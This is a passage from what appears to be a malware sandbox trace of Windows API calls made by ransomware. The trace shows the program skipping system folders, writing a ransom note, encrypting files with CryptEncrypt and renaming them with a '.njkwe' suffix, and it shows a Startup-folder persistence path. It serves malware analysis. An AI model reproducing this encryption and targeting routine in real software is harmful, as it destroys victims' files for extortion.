dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.393] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0074.394] CloseHandle (hObject=0x434) returned 1 [0074.394] GetProcessHeap () returned 0xbe0000 [0074.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.394] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0074.394] FindClose (in: hFindFile=0xc1a2e0 | out: hFindFile=0xc1a2e0) returned 1 [0074.394] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0074.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.397] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0074.397] CloseHandle (hObject=0x430) returned 1 [0074.398] GetProcessHeap () returned 0xbe0000 [0074.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0074.398] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{1e05dd5d-a022-46c5-963c-b20de341170f}", cAlternateFileName="{1E05D~1")) returned 1 [0074.398] lstrcmpiW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="Windows") returned -1 [0074.398] lstrcmpiW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="$Recycle.bin") returned 1 [0074.398] lstrcmpiW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="System Volume Information") returned -1 [0074.398] lstrcmpiW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="Program Files") returned -1 [0074.398] lstrcmpiW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="Program Files (x86)") returned -1 [0074.398] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned 80 [0074.398] lstrcmpW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2=".") returned 1 [0074.398] lstrcmpW (lpString1="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="..") returned 1 [0074.398] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.398] GetProcessHeap () returned 0xbe0000 [0074.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0074.398] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*") returned 82 [0074.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0074.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.399] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.399] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.399] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.399] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.399] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\.") returned 82 [0074.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.399] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.399] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.399] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.399] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.399] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.399] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\..") returned 83 [0074.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.399] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ebc18d, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ebc18d, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ebc18d, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0074.399] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0074.399] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0074.399] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0074.399] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0074.399] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0074.400] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned 99 [0074.400] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0074.400] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.400] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0074.400] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.400] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.400] GetTickCount () returned 0x1152f3a [0074.400] GetTickCount () returned 0x1152f3a [0074.400] GetTickCount () returned 0x1152f3a [0074.400] GetTickCount () returned 0x1152f3a [0074.400] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.400] GetProcessHeap () returned 0xbe0000 [0074.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.400] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x504, lpOverlapped=0x0) returned 1 [0074.449] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.449] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x504, lpOverlapped=0x0) returned 1 [0074.449] GetProcessHeap () returned 0xbe0000 [0074.449] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.449] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.449] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.450] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.450] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.450] CloseHandle (hObject=0x434) returned 1 [0074.450] GetProcessHeap () returned 0xbe0000 [0074.450] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.450] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0074.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.450] GetProcessHeap () returned 0xbe0000 [0074.451] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.451] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ebc18d, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ebc18d, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ebc18d, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0074.451] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0074.451] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0074.451] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0074.451] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0074.451] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0074.451] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml") returned 100 [0074.451] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0074.451] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.451] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0074.451] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.451] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.451] GetTickCount () returned 0x1152f69 [0074.451] GetTickCount () returned 0x1152f69 [0074.451] GetTickCount () returned 0x1152f69 [0074.451] GetTickCount () returned 0x1152f69 [0074.451] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.451] GetProcessHeap () returned 0xbe0000 [0074.451] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.451] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.452] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.453] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.453] GetProcessHeap () returned 0xbe0000 [0074.453] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.453] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.453] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.454] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.454] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.454] CloseHandle (hObject=0x434) returned 1 [0074.454] GetProcessHeap () returned 0xbe0000 [0074.454] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.454] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0074.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.454] GetProcessHeap () returned 0xbe0000 [0074.455] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.455] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0074.455] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0074.455] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0074.455] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0074.455] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0074.455] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0074.455] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned 85 [0074.455] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0074.455] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0074.455] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.455] GetProcessHeap () returned 0xbe0000 [0074.455] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.455] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*") returned 87 [0074.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0074.456] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.456] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.456] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.456] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.456] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.456] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\.") returned 87 [0074.456] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.456] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.456] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.456] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.456] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.456] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.456] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.456] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\..") returned 88 [0074.456] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.456] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0074.456] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0074.456] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0074.456] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0074.456] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0074.456] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0074.456] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned 93 [0074.456] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0074.456] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0074.456] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.456] GetProcessHeap () returned 0xbe0000 [0074.456] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.456] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*") returned 95 [0074.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0074.457] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.457] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.457] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.457] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.457] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.457] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\.") returned 95 [0074.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.457] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, 